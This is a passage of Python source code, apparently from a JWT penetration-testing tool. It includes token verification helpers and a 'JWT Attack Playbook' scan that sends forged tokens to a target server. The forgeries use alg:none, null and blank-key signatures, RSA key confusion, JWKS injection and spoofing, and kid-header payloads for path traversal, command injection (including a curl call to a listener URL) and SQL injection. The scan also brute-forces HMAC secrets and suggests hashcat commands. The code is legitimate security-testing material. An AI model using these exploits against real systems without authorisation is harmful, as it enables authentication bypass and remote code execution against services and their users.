key = RSA.importKey(open(pubKey).read()) 860 | newContents = genContents(headDict, paylDict) 861 | newContents = newContents.encode('UTF-8') 862 | if "-" in sig: 863 | try: 864 | sig = base64.urlsafe_b64decode(sig) 865 | except: 866 | pass 867 | try: 868 | sig = base64.urlsafe_b64decode(sig+"=") 869 | except: 870 | pass 871 | try: 872 | sig = base64.urlsafe_b64decode(sig+"==") 873 | except: 874 | pass 875 | elif "+" in sig: 876 | try: 877 | sig = base64.b64decode(sig) 878 | except: 879 | pass 880 | try: 881 | sig = base64.b64decode(sig+"=") 882 | except: 883 | pass 884 | try: 885 | sig = base64.b64decode(sig+"==") 886 | except: 887 | pass 888 | else: 889 | cprintc("Signature not Base64 encoded HEX", "red") 890 | if headDict['alg'] == "RS256": 891 | h = SHA256.new(newContents) 892 | elif headDict['alg'] == "RS384": 893 | h = SHA384.new(newContents) 894 | elif headDict['alg'] == "RS512": 895 | h = SHA512.new(newContents) 896 | else: 897 | cprintc("Invalid RSA algorithm", "red") 898 | verifier = PKCS1_v1_5.new(key) 899 | try: 900 | valid = verifier.verify(h, sig) 901 | if valid: 902 | cprintc("RSA Signature is VALID", "green") 903 | valid = True 904 | else: 905 | cprintc("RSA Signature is INVALID", "red") 906 | valid = False 907 | except: 908 | cprintc("The Public Key is invalid", "red") 909 | return valid 910 | 911 | def verifyTokenEC(headDict, paylDict, sig, pubKey): 912 | newContents = genContents(headDict, paylDict) 913 | message = newContents.encode('UTF-8') 914 | if "-" in str(sig): 915 | try: 916 | signature = base64.urlsafe_b64decode(sig) 917 | except: 918 | pass 919 | try: 920 | signature = base64.urlsafe_b64decode(sig+"=") 921 | except: 922 | pass 923 | try: 924 | signature = base64.urlsafe_b64decode(sig+"==") 925 | except: 926 | pass 927 | elif "+" in str(sig): 928 | try: 929 | signature = base64.b64decode(sig) 930 | except: 931 | pass 932 | try: 933 | signature = base64.b64decode(sig+"=") 934 | except: 935 | pass 936 | try: 937 | signature = base64.b64decode(sig+"==") 938 | except: 939 | pass 940 | else: 941 | cprintc("Signature not Base64 encoded HEX", "red") 942 | if headDict['alg'] == "ES256": 943 | h = SHA256.new(message) 944 | elif headDict['alg'] == "ES384": 945 | h = SHA384.new(message) 946 | elif headDict['alg'] == "ES512": 947 | h = SHA512.new(message) 948 | else: 949 | cprintc("Invalid ECDSA algorithm", "red") 950 | pubkey = open(pubKey, "r") 951 | pub_key = ECC.import_key(pubkey.read()) 952 | verifier = DSS.new(pub_key, 'fips-186-3') 953 | try: 954 | verifier.verify(h, signature) 955 | cprintc("ECC Signature is VALID", "green") 956 | valid = True 957 | except: 958 | cprintc("ECC Signature is INVALID", "red") 959 | valid = False 960 | return valid 961 | 962 | def verifyTokenPSS(headDict, paylDict, sig, pubKey): 963 | key = RSA.importKey(open(pubKey).read()) 964 | newContents = genContents(headDict, paylDict) 965 | newContents = newContents.encode('UTF-8') 966 | if "-" in sig: 967 | try: 968 | sig = base64.urlsafe_b64decode(sig) 969 | except: 970 | pass 971 | try: 972 | sig = base64.urlsafe_b64decode(sig+"=") 973 | except: 974 | pass 975 | try: 976 | sig = base64.urlsafe_b64decode(sig+"==") 977 | except: 978 | pass 979 | elif "+" in sig: 980 | try: 981 | sig = base64.b64decode(sig) 982 | except: 983 | pass 984 | try: 985 | sig = base64.b64decode(sig+"=") 986 | except: 987 | pass 988 | try: 989 | sig = base64.b64decode(sig+"==") 990 | except: 991 | pass 992 | else: 993 | cprintc("Signature not Base64 encoded HEX", "red") 994 | if headDict['alg'] == "PS256": 995 | h = SHA256.new(newContents) 996 | elif headDict['alg'] == "PS384": 997 | h = SHA384.new(newContents) 998 | elif headDict['alg'] == "PS512": 999 | h = SHA512.new(newContents) 1000 | else: 1001 | cprintc("Invalid RSA algorithm", "red") 1002 | verifier = pss.new(key) 1003 | try: 1004 | valid = verifier.verify(h, sig) 1005 | cprintc("RSA-PSS Signature is VALID", "green") 1006 | valid = True 1007 | except: 1008 | cprintc("RSA-PSS Signature is INVALID", "red") 1009 | valid = False 1010 | return valid 1011 | 1012 | def exportJWKS(jku): 1013 | try: 1014 | kid = headDict["kid"] 1015 | newSig, newContents, newjwks, privKeyName, jwksName, fulljwks = jwksGen(headDict, paylDict, jku, config['crypto']['privkey'], kid) 1016 | except: 1017 | kid = "" 1018 | newSig, newContents, newjwks, privKeyName, jwksName, fulljwks = jwksGen(headDict, paylDict, jku, config['crypto']['privkey']) 1019 | return newContents, newSig 1020 | 1021 | def parseJWKS(jwksfile): 1022 | jwks = open(jwksfile, "r").read() 1023 | jwksDict = json.loads(jwks, object_pairs_hook=OrderedDict) 1024 | nowtime = int(datetime.now().timestamp()) 1025 | cprintc("JWKS Contents:", "cyan") 1026 | try: 1027 | keyLen = len(jwksDict["keys"]) 1028 | cprintc("Number of keys: "+str(keyLen), "cyan") 1029 | i = -1 1030 | for jkey in range(0,keyLen): 1031 | i += 1 1032 | cprintc("\n--------", "white") 1033 | try: 1034 | cprintc("Key "+str(i+1), "cyan") 1035 | kid = str(jwksDict["keys"][i]["kid"]) 1036 | cprintc("kid: "+kid, "cyan") 1037 | except: 1038 | kid = i 1039 | cprintc("Key "+str(i+1), "cyan") 1040 | for keyVal in jwksDict["keys"][i].items(): 1041 | keyVal = keyVal[0] 1042 | cprintc("[+] "+keyVal+" = "+str(jwksDict["keys"][i][keyVal]), "green") 1043 | try: 1044 | x = str(jwksDict["keys"][i]["x"]) 1045 | y = str(jwksDict["keys"][i]["y"]) 1046 | cprintc("\nFound ECC key factors, generating a public key", "cyan") 1047 | pubkeyName = genECPubFromJWKS(x, y, kid, nowtime) 1048 | cprintc("[+] "+pubkeyName, "green") 1049 | cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") 1050 | valid = verifyTokenEC(headDict, paylDict, sig, pubkeyName) 1051 | except: 1052 | pass 1053 | try: 1054 | n = str(jwksDict["keys"][i]["n"]) 1055 | e = str(jwksDict["keys"][i]["e"]) 1056 | cprintc("\nFound RSA key factors, generating a public key", "cyan") 1057 | pubkeyName = genRSAPubFromJWKS(n, e, kid, nowtime) 1058 | cprintc("[+] "+pubkeyName, "green") 1059 | cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") 1060 | valid = verifyTokenRSA(headDict, paylDict, sig, pubkeyName) 1061 | except: 1062 | pass 1063 | except: 1064 | cprintc("Single key file", "white") 1065 | for jkey in jwksDict: 1066 | cprintc("[+] "+jkey+" = "+str(jwksDict[jkey]), "green") 1067 | try: 1068 | kid = 1 1069 | x = str(jwksDict["x"]) 1070 | y = str(jwksDict["y"]) 1071 | cprintc("\nFound ECC key factors, generating a public key", "cyan") 1072 | pubkeyName = genECPubFromJWKS(x, y, kid, nowtime) 1073 | cprintc("[+] "+pubkeyName, "green") 1074 | cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") 1075 | valid = verifyTokenEC(headDict, paylDict, sig, pubkeyName) 1076 | except: 1077 | pass 1078 | try: 1079 | kid = 1 1080 | n = str(jwksDict["n"]) 1081 | e = str(jwksDict["e"]) 1082 | cprintc("\nFound RSA key factors, generating a public key", "cyan") 1083 | pubkeyName = genRSAPubFromJWKS(n, e, kid, nowtime) 1084 | cprintc("[+] "+pubkeyName, "green") 1085 | cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") 1086 | valid = verifyTokenRSA(headDict, paylDict, sig, pubkeyName) 1087 | except: 1088 | pass 1089 | 1090 | def genECPubFromJWKS(x, y, kid, nowtime): 1091 | try: 1092 | x = int.from_bytes(base64.urlsafe_b64decode(x), byteorder='big') 1093 | except: 1094 | pass 1095 | try: 1096 | x = int.from_bytes(base64.urlsafe_b64decode(x+"="), byteorder='big') 1097 | except: 1098 | pass 1099 | try: 1100 | x = int.from_bytes(base64.urlsafe_b64decode(x+"=="), byteorder='big') 1101 | except: 1102 | pass 1103 | try: 1104 | y = int.from_bytes(base64.urlsafe_b64decode(y), byteorder='big') 1105 | except: 1106 | pass 1107 | try: 1108 | y = int.from_bytes(base64.urlsafe_b64decode(y+"="), byteorder='big') 1109 | except: 1110 | pass 1111 | try: 1112 | y = int.from_bytes(base64.urlsafe_b64decode(y+"=="), byteorder='big') 1113 | except: 1114 | pass 1115 | new_key = ECC.construct(curve='P-256', point_x=x, point_y=y) 1116 | pubKey = new_key.public_key().export_key(format="PEM")+"\n" 1117 | pubkeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem" 1118 | with open(pubkeyName, 'w') as test_pub_out: 1119 | test_pub_out.write(pubKey) 1120 | return pubkeyName 1121 | 1122 | def genRSAPubFromJWKS(n, e, kid, nowtime): 1123 | try: 1124 | n = int.from_bytes(base64.urlsafe_b64decode(n), byteorder='big') 1125 | except: 1126 | pass 1127 | try: 1128 | n = int.from_bytes(base64.urlsafe_b64decode(n+"="), byteorder='big') 1129 | except: 1130 | pass 1131 | try: 1132 | n = int.from_bytes(base64.urlsafe_b64decode(n+"=="), byteorder='big') 1133 | except: 1134 | pass 1135 | try: 1136 | e = int.from_bytes(base64.urlsafe_b64decode(e), byteorder='big') 1137 | except: 1138 | pass 1139 | try: 1140 | e = int.from_bytes(base64.urlsafe_b64decode(e+"="), byteorder='big') 1141 | except: 1142 | pass 1143 | try: 1144 | e = int.from_bytes(base64.urlsafe_b64decode(e+"=="), byteorder='big') 1145 | except: 1146 | pass 1147 | new_key = RSA.construct((n, e)) 1148 | pubKey = new_key.publickey().exportKey(format="PEM") 1149 | pubkeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem" 1150 | with open(pubkeyName, 'w') as test_pub_out: 1151 | test_pub_out.write(pubKey.decode()+"\n") 1152 | return pubkeyName 1153 | 1154 | def getVal(promptString): 1155 | newVal = input(promptString) 1156 | try: 1157 | newVal = json.loads(newVal) 1158 | except ValueError: 1159 | try: 1160 | newVal = json.loads(newVal.replace("'", '"')) 1161 | except ValueError: 1162 | pass 1163 | return newVal 1164 | 1165 | def genContents(headDict, paylDict, newContents=""): 1166 | if paylDict == {}: 1167 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"." 1168 | else: 1169 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1170 | return newContents.encode().decode('UTF-8') 1171 | 1172 | def dissectPayl(paylDict, count=False): 1173 | timeseen = 0 1174 | comparestamps = [] 1175 | countval = 0 1176 | expiredtoken = False 1177 | nowtime = int(datetime.now().timestamp()) 1178 | for claim in paylDict: 1179 | countval += 1 1180 | if count: 1181 | placeholder = str(countval) 1182 | else: 1183 | placeholder = "+" 1184 | if claim in ["exp", "nbf", "iat"]: 1185 | timestamp = datetime.fromtimestamp(int(paylDict[claim])) 1186 | if claim == "exp": 1187 | if int(timestamp.timestamp()) < nowtime: 1188 | expiredtoken = True 1189 | cprintc("["+placeholder+"] "+claim+" = "+str(paylDict[claim])+" ==> TIMESTAMP = "+timestamp.strftime('%Y-%m-%d %H:%M:%S')+" (UTC)", "green") 1190 | timeseen += 1 1191 | comparestamps.append(claim) 1192 | elif isinstance(paylDict[claim], dict): 1193 | cprintc("["+placeholder+"] "+claim+" = JSON object:", "green") 1194 | for subclaim in paylDict[claim]: 1195 | if type(castInput(paylDict[claim][subclaim])) == str: 1196 | cprintc(" [+] "+subclaim+" = \""+str(paylDict[claim][subclaim])+"\"", "green") 1197 | elif paylDict[claim][subclaim] == None: 1198 | cprintc(" [+] "+subclaim+" = null", "green") 1199 | elif paylDict[claim][subclaim] == True and not paylDict[claim][subclaim] == 1: 1200 | cprintc(" [+] "+subclaim+" = true", "green") 1201 | elif paylDict[claim][subclaim] == False and not paylDict[claim][subclaim] == 0: 1202 | cprintc(" [+] "+subclaim+" = false", "green") 1203 | else: 1204 | cprintc(" [+] "+subclaim+" = "+str(paylDict[claim][subclaim]), "green") 1205 | else: 1206 | if type(paylDict[claim]) == str: 1207 | cprintc("["+placeholder+"] "+claim+" = \""+str(paylDict[claim])+"\"", "green") 1208 | else: 1209 | cprintc("["+placeholder+"] "+claim+" = "+str(paylDict[claim]), "green") 1210 | return comparestamps, expiredtoken 1211 | 1212 | def validateToken(jwt): 1213 | try: 1214 | headB64, paylB64, sig = jwt.split(".",3) 1215 | except: 1216 | cprintc("[-] Invalid token:\nNot 3 parts -> header.payload.signature", "red") 1217 | exit(1) 1218 | try: 1219 | sig = base64.urlsafe_b64encode(base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))).decode('UTF-8').strip("=") 1220 | except: 1221 | cprintc("[-] Invalid token:\nCould not base64-decode SIGNATURE - incorrect formatting/invalid characters", "red") 1222 | cprintc("----------------", "white") 1223 | cprintc(headB64, "cyan") 1224 | cprintc(paylB64, "cyan") 1225 | cprintc(sig, "red") 1226 | exit(1) 1227 | contents = headB64+"."+paylB64 1228 | contents = contents.encode() 1229 | try: 1230 | head = base64.urlsafe_b64decode(headB64 + "=" * (-len(headB64) % 4)) 1231 | except: 1232 | cprintc("[-] Invalid token:\nCould not base64-decode HEADER - incorrect formatting/invalid characters", "red") 1233 | cprintc("----------------", "white") 1234 | cprintc(headB64, "red") 1235 | cprintc(paylB64, "cyan") 1236 | cprintc(sig, "cyan") 1237 | exit(1) 1238 | try: 1239 | payl = base64.urlsafe_b64decode(paylB64 + "=" * (-len(paylB64) % 4)) 1240 | except: 1241 | cprintc("[-] Invalid token:\nCould not base64-decode PAYLOAD - incorrect formatting/invalid characters", "red") 1242 | cprintc("----------------", "white") 1243 | cprintc(headB64, "cyan") 1244 | cprintc(paylB64, "red") 1245 | cprintc(sig, "cyan") 1246 | exit(1) 1247 | try: 1248 | headDict = json.loads(head, object_pairs_hook=OrderedDict) 1249 | except: 1250 | cprintc("[-] Invalid token:\nHEADER not valid JSON format", "red") 1251 | 1252 | cprintc(head.decode('UTF-8'), "red") 1253 | exit(1) 1254 | if payl.decode() == "": 1255 | cprintc("Payload is blank", "white") 1256 | paylDict = {} 1257 | else: 1258 | try: 1259 | paylDict = json.loads(payl, object_pairs_hook=OrderedDict) 1260 | except: 1261 | cprintc("[-] Invalid token:\nPAYLOAD not valid JSON format", "red") 1262 | cprintc(payl.decode('UTF-8'), "red") 1263 | exit(1) 1264 | if args.verbose: 1265 | cprintc("Token: "+head.decode()+"."+payl.decode()+"."+sig+"\n", "green") 1266 | return headDict, paylDict, sig, contents 1267 | 1268 | def rejigToken(headDict, paylDict, sig): 1269 | cprintc("=====================\nDecoded Token Values:\n=====================", "white") 1270 | cprintc("\nToken header values:", "white") 1271 | for claim in headDict: 1272 | if isinstance(headDict[claim], dict): 1273 | cprintc("[+] "+claim+" = JSON object:", "green") 1274 | for subclaim in headDict[claim]: 1275 | if headDict[claim][subclaim] == None: 1276 | cprintc(" [+] "+subclaim+" = null", "green") 1277 | elif headDict[claim][subclaim] == True: 1278 | cprintc(" [+] "+subclaim+" = true", "green") 1279 | elif headDict[claim][subclaim] == False: 1280 | cprintc(" [+] "+subclaim+" = false", "green") 1281 | elif type(headDict[claim][subclaim]) == str: 1282 | cprintc(" [+] "+subclaim+" = \""+str(headDict[claim][subclaim])+"\"", "green") 1283 | else: 1284 | cprintc(" [+] "+subclaim+" = "+str(headDict[claim][subclaim]), "green") 1285 | else: 1286 | if type(headDict[claim]) == str: 1287 | cprintc("[+] "+claim+" = \""+str(headDict[claim])+"\"", "green") 1288 | else: 1289 | cprintc("[+] "+claim+" = "+str(headDict[claim]), "green") 1290 | cprintc("\nToken payload values:", "white") 1291 | comparestamps, expiredtoken = dissectPayl(paylDict) 1292 | if len(comparestamps) >= 2: 1293 | cprintc("\nSeen timestamps:", "white") 1294 | cprintc("[*] "+comparestamps[0]+" was seen", "green") 1295 | claimnum = 0 1296 | for claim in comparestamps: 1297 | timeoff = int(paylDict[comparestamps[claimnum]])-int(paylDict[comparestamps[0]]) 1298 | if timeoff != 0: 1299 | timecalc = timeoff 1300 | if timecalc < 0: 1301 | timecalc = timecalc*-1 1302 | days,hours,mins = 0,0,0 1303 | if timecalc >= 86400: 1304 | days = str(timecalc/86400) 1305 | days = int(float(days)) 1306 | timecalc -= days*86400 1307 | if timecalc >= 3600: 1308 | hours = str(timecalc/3600) 1309 | hours = int(float(hours)) 1310 | timecalc -= hours*3600 1311 | if timecalc >= 60: 1312 | mins = str(timecalc/60) 1313 | mins = int(float(mins)) 1314 | timecalc -= mins*60 1315 | if timeoff < 0: 1316 | timeoff = timeoff*-1 1317 | prepost = "[*] "+claim+" is earlier than "+comparestamps[0]+" by: " 1318 | cprintc(prepost+str(days)+" days, "+str(hours)+" hours, "+str(mins)+" mins", "green") 1319 | else: 1320 | prepost = "[*] "+claim+" is later than "+comparestamps[0]+" by: " 1321 | cprintc(prepost+str(days)+" days, "+str(hours)+" hours, "+str(mins)+" mins", "green") 1322 | claimnum += 1 1323 | if expiredtoken: 1324 | cprintc("[-] TOKEN IS EXPIRED!", "red") 1325 | cprintc("\n----------------------\nJWT common timestamps:\niat = IssuedAt\nexp = Expires\nnbf = NotBefore\n----------------------\n", "white") 1326 | if args.targeturl and not args.crack and not args.exploit and not args.verify and not args.tamper and not args.sign: 1327 | cprintc("[+] Sending token", "cyan") 1328 | newContents = genContents(headDict, paylDict) 1329 | jwtOut(newContents+"."+sig, "Sending token") 1330 | return headDict, paylDict, sig 1331 | 1332 | def searchLog(logID): 1333 | qResult = "" 1334 | with open(logFilename, 'r') as logFile: 1335 | logLine = logFile.readline() 1336 | while logLine: 1337 | if re.search('^'+logID, logLine): 1338 | qResult = logLine 1339 | break 1340 | else: 1341 | logLine = logFile.readline() 1342 | if qResult: 1343 | qOutput = re.sub(' - eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', '', qResult) 1344 | qOutput = re.sub(logID+' - ', '', qOutput) 1345 | try: 1346 | jwt = re.findall('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', qResult)[-1] 1347 | except: 1348 | cprintc("JWT not included in log", "red") 1349 | exit(1) 1350 | cprintc(logID+"\n"+qOutput, "green") 1351 | cprintc("JWT from request:", "cyan") 1352 | cprintc(jwt, "green") 1353 | # headDict, paylDict, sig, contents = validateToken(jwt) 1354 | # rejigToken(headDict, paylDict, sig) 1355 | return jwt 1356 | else: 1357 | cprintc("ID not found in logfile", "red") 1358 | 1359 | def injectOut(newheadDict, newpaylDict): 1360 | if not args.crack and not args.exploit and not args.verify and not args.tamper and not args.sign: 1361 | desc = "Injected token with unchanged signature" 1362 | jwtOut(newContents+"."+sig, "Injected claim", desc) 1363 | elif args.sign: 1364 | signingToken(newheadDict, newpaylDict) 1365 | else: 1366 | runActions() 1367 | 1368 | def scanModePlaybook(): 1369 | cprintc("\nLAUNCHING SCAN: JWT Attack Playbook", "magenta") 1370 | origalg = headDict["alg"] 1371 | # No token 1372 | tmpCookies = config['argvals']['cookies'] 1373 | tmpHeader = config['argvals']['header'] 1374 | if config['argvals']['headerloc'] == "cookies": 1375 | config['argvals']['cookies'] = strip_dict_cookies(config['argvals']['cookies']) 1376 | elif config['argvals']['headerloc'] == "headers": 1377 | config['argvals']['header'] = "" 1378 | config['argvals']['overridesub'] = "true" 1379 | config['argvals']['cookies'] = tmpCookies 1380 | config['argvals']['header'] = tmpHeader 1381 | # Broken sig 1382 | jwtTweak = contents.decode()+"."+sig[:-4] 1383 | jwtOut(jwtTweak, "Broken signature", "This token was sent to check if the signature is being checked") 1384 | # Persistent 1385 | jwtOut(jwt, "Persistence check 1 (should always be valid)", "Original token sent to check if tokens work after invalid submissions") 1386 | # Claim processing order - check reflected output in all claims 1387 | reflectedClaims() 1388 | jwtOut(jwt, "Persistence check 2 (should always be valid)", "Original token sent to check if tokens work after invalid submissions") 1389 | # Weak HMAC secret 1390 | if headDict['alg'][:2] == "HS" or headDict['alg'][:2] == "hs": 1391 | cprintc("Testing "+headDict['alg']+" token against common JWT secrets (jwt-common.txt)", "cyan") 1392 | config['argvals']['keyList'] = "jwt-common.txt" 1393 | crackSig(sig, contents) 1394 | # Exploit: blank password accepted in signature 1395 | key = "" 1396 | newSig, newContents = signTokenHS(headDict, paylDict, key, 256) 1397 | jwtBlankPw = newContents+"."+newSig 1398 | jwtOut(jwtBlankPw, "Exploit: Blank password accepted in signature (-X b)", "This token can exploit a hard-coded blank password in the config") 1399 | # Exploit: null signature 1400 | jwtNull = checkNullSig(contents) 1401 | jwtOut(jwtNull, "Exploit: Null signature (-X n)", "This token was sent to check if a null signature can bypass checks") 1402 | # Exploit: alg:none 1403 | noneToks = checkAlgNone(headDict, paylB64) 1404 | zippedToks = dict(zip(noneToks, ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""])) 1405 | for noneTok in zippedToks: 1406 | jwtOut(noneTok, "Exploit: "+zippedToks[noneTok]+" (-X a)", "Testing whether the None algorithm is accepted - which allows forging unsigned tokens") 1407 | # Exploit: key confusion - use provided PubKey 1408 | if config['crypto']['pubkey']: 1409 | newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey']) 1410 | jwtOut(newTok+"."+newSig, "Exploit: RSA Key Confusion Exploit (provided Public Key)") 1411 | headDict["alg"] = origalg 1412 | # Exploit: jwks injection 1413 | try: 1414 | origjwk = headDict["jwk"] 1415 | except: 1416 | origjwk = False 1417 | jwksig, jwksContents = jwksEmbed(headDict, paylDict) 1418 | jwtOut(jwksContents+"."+jwksig, "Exploit: Injected JWKS (-X i)") 1419 | headDict["alg"] = origalg 1420 | if origjwk: 1421 | headDict["jwk"] = origjwk 1422 | else: 1423 | del headDict["jwk"] 1424 | # Exploit: spoof jwks 1425 | try: 1426 | origjku = headDict["jku"] 1427 | except: 1428 | origjku = False 1429 | jku = config['services']['jwksloc'] 1430 | newContents, newSig = exportJWKS(jku) 1431 | jwtOut(newContents+"."+newSig, "Exploit: Spoof JWKS (-X s)", "Signed with JWKS at "+config['services']['jwksloc']) 1432 | if origjku: 1433 | headDict["jku"] = origjku 1434 | else: 1435 | del headDict["jku"] 1436 | headDict["alg"] = origalg 1437 | # kid testing... start 1438 | try: 1439 | origkid = headDict["kid"] 1440 | except: 1441 | origkid = False 1442 | # kid inject: blank field, sign with null 1443 | newheadDict, newHeadB64 = injectheaderclaim("kid", "") 1444 | key = open("null.txt").read() 1445 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1446 | jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with blank kid") 1447 | # kid inject: path traversal - known path - check for robots.txt, sign with variations of location 1448 | newheadDict, newHeadB64 = injectheaderclaim("kid", "../../../../../../dev/null") 1449 | key = open("null.txt").read() 1450 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1451 | jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"[path traversal]/dev/null\"") 1452 | newheadDict, newHeadB64 = injectheaderclaim("kid", "/dev/null") 1453 | key = open("null.txt").read() 1454 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1455 | jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"/dev/null\"") 1456 | # kid inject: path traversal - bad path - sign with null 1457 | newheadDict, newHeadB64 = injectheaderclaim("kid", "/invalid_path") 1458 | key = open("null.txt").read() 1459 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1460 | jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"/invalid_path\"") 1461 | # kid inject: RCE - sign with null 1462 | newheadDict, newHeadB64 = injectheaderclaim("kid", "|sleep 10") 1463 | key = open("null.txt").read() 1464 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1465 | jwtOut(newContents+"."+newSig, "Injected kid claim - RCE attempt - SLEEP 10 (did this request pause?)") 1466 | if config['services']['httplistener']: 1467 | injectUrl = config['services']['httplistener']+"/RCE_in_kid" 1468 | newheadDict, newHeadB64 = injectheaderclaim("kid", "| curl "+injectUrl) 1469 | key = open("null.txt").read() 1470 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1471 | jwtOut(newContents+"."+newSig, "Injected kid claim - RCE attempt - curl "+injectUrl+" (did this URL get accessed?)") 1472 | # kid inject: SQLi explicit value 1473 | newheadDict, newHeadB64 = injectheaderclaim("kid", "x' UNION SELECT '1';--") 1474 | key = "1" 1475 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1476 | jwtOut(newContents+"."+newSig, "Injected kid claim - signed with secret = '1' from SQLi") 1477 | # kid testing... end 1478 | if origkid: 1479 | headDict["kid"] = origkid 1480 | else: 1481 | del headDict["kid"] 1482 | headDict["alg"] = origalg 1483 | # x5u external 1484 | # Force External Interactions 1485 | if config['services']['httplistener']: 1486 | for headerClaim in headDict: 1487 | injectExternalInteractionHeader(config['services']['httplistener']+"/inject_existing_", headerClaim) 1488 | for payloadClaim in paylDict: 1489 | injectExternalInteractionPayload(config['services']['httplistener']+"/inject_existing_", payloadClaim) 1490 | cprintc("External service interactions have been tested - check your listener for interactions", "green") 1491 | else: 1492 | cprintc("External service interactions not tested - enter listener URL into 'jwtconf.ini' to try this option", "red") 1493 | # Accept Common HMAC secret (as alterative signature) 1494 | with open(config['input']['wordlist']) as commonPassList: 1495 | commonPass = commonPassList.readline().rstrip() 1496 | while commonPass: 1497 | newSig, newContents = signTokenHS(headDict, paylDict, commonPass, 256) 1498 | jwtOut(newContents+"."+newSig, "Checking for alternative accepted HMAC signatures, based on common passwords. Testing: "+commonPass+"", "This token can exploit a hard-coded common password in the config") 1499 | commonPass = commonPassList.readline().rstrip() 1500 | # SCAN COMPLETE 1501 | cprintc("Scanning mode completed: review the above results.\n", "magenta") 1502 | # Further manual testing: check expired token, brute key, find Public Key, run other scans 1503 | cprintc("The following additional checks should be performed that are better tested manually:", "magenta") 1504 | if headDict['alg'][:2] == "HS" or headDict['alg'][:2] == "hs": 1505 | cprintc("[+] Try testing "+headDict['alg'][:2]+" token against weak password configurations by running the following hashcat cracking options:", "green") 1506 | cprintc("(Already testing against passwords in jwt-common.txt)", "cyan") 1507 | cprintc("Try using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.\nhashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:\n\n[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt\n[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule\n[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6", "cyan") 1508 | if headDict['alg'][:2] != "HS" and headDict['alg'][:2] != "hs": 1509 | cprintc("[+] Try hunting for a Public Key for this token. Validate any JWKS you find (-V -jw [jwks_file]) and then use the generated Public Key file with the Playbook Scan (-pk [kid_from_jwks].pem)", "green") 1510 | cprintc("Common locations for Public Keys are either the web application's SSL key, or stored as a JWKS file in one of these locations:", "cyan") 1511 | with open('jwks-common.txt', "r", encoding='utf-8', errors='ignore') as jwksLst: 1512 | nextVal = jwksLst.readline().rstrip() 1513 | while nextVal: 1514 | cprintc(nextVal, "cyan") 1515 | nextVal = jwksLst.readline().rstrip() 1516 | try: 1517 | timestamp = datetime.fromtimestamp(int(paylDict['exp'])) 1518 | cprintc("[+] Try waiting for the token to expire (\"exp\" value set to: "+timestamp.strftime('%Y-%m-%d %H:%M:%S')+" (UTC))", "green") 1519 | cprintc("Check if still working once expired.", "cyan") 1520 | except: 1521 | pass 1522 | 1523 | def scanModeErrors(): 1524 | cprintc("\nLAUNCHING SCAN: Forced Errors", "magenta") 1525 | # Inject dangerous content-types into existing header claims 1526 | injectEachHeader(None) 1527 | injectEachHeader(True) 1528 | injectEachHeader(False) 1529 | injectEachHeader("jwt_tool") 1530 | injectEachHeader(0) 1531 | # Inject dangerous content-types into existing payload claims 1532 | injectEachPayload(None) 1533 | injectEachPayload(True) 1534 | injectEachPayload(False) 1535 | injectEachPayload("jwt_tool") 1536 | injectEachPayload(0) 1537 | cprintc("Scanning mode completed: review the above results.\n", "magenta") 1538 | 1539 | def scanModeCommonClaims(): 1540 | cprintc("\nLAUNCHING SCAN: Common Claim Injection", "magenta") 1541 | # Inject external URLs into common claims 1542 | with open(config['input']['commonHeaders'], "r", encoding='utf-8', errors='ignore') as commonHeaders: 1543 | nextHeader = commonHeaders.readline().rstrip() 1544 | while nextHeader: 1545 | injectExternalInteractionHeader(config['services']['httplistener']+"/inject_common_", nextHeader) 1546 | nextHeader = commonHeaders.readline().rstrip() 1547 | with open(config['input']['commonPayloads'], "r", encoding='utf-8', errors='ignore') as commonPayloads: 1548 | nextPayload = commonPayloads.readline().rstrip() 1549 | while nextPayload: 1550 | injectExternalInteractionPayload(config['services']['httplistener']+"/inject_common_", nextPayload) 1551 | nextPayload = commonPayloads.readline().rstrip() 1552 | # Inject dangerous content-types into common claims 1553 | injectCommonClaims(None) 1554 | injectCommonClaims(True) 1555 | injectCommonClaims(False) 1556 | injectCommonClaims("jwt_tool") 1557 | injectCommonClaims(0) 1558 | 1559 | cprintc("Scanning mode completed: review the above results.\n", "magenta") 1560 | 1561 | def injectCommonClaims(contentVal): 1562 | with open(config['input']['commonHeaders'], "r", encoding='utf-8', errors='ignore') as commonHeaders: 1563 | nextHeader = commonHeaders.readline().rstrip() 1564 | while nextHeader: 1565 | origVal = "" 1566 | try: 1567 | origVal = headDict[nextHeader] 1568 | except: 1569 | pass 1570 | headDict[nextHeader] = contentVal 1571 | newContents = genContents(headDict, paylDict) 1572 